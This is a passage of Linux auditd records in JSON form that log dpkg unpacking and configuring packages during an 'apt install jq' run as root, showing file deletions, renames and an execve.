"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:705",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0004",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:706",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0005",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:707",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0006",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:708",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0007",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:709",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0008",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:710",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0009",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:711",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0010",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.025:712",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba2972a0",
"0x556eba44af30",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277200,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.033:713",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550dc500",
"0x564c5510a0d0",
"0x564c550d6b70",
"0x564c550bd690"
]
},
"EXECVE": {
"argc": 5,
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.049:714",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0000",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.053:715",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 276984,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0001",
"inode": 276984,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.061:716",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0002",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.069:717",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0003",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.077:718",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0004",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.081:719",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0005",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.085:720",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
